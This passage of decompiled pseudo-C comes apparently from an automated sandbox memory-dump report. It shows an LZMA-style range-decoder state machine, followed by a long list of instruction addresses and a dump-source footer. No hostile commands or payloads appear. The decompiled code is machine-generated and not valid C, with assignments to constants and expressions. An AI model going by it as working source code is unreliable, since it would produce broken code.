							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x00406b0a
                  0x00406b0a
                  0x00406b0e
                  0x00406bc5
                  0x00406bc8
                  0x00406bd4
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00406e2a
                  0x00406e2a
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406e7b
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00000000
                  0x0040702e
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00000000
                  0x00406e9d
                  0x00406b14
                  0x00406b18
                  0x00407059
                  0x00407059
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406b1e
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x00000000
                  0x00407055
                  0x00406b38
                  0x00406b3b
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00406b6c
                  0x00406b6c
                  0x00406b6c
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00000000
                  0x0040684b
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b96
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00000000
                  0x00406e27
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00000000
                  0x00406f9a
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00000000
                  0x00406def
                  0x00406ded
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
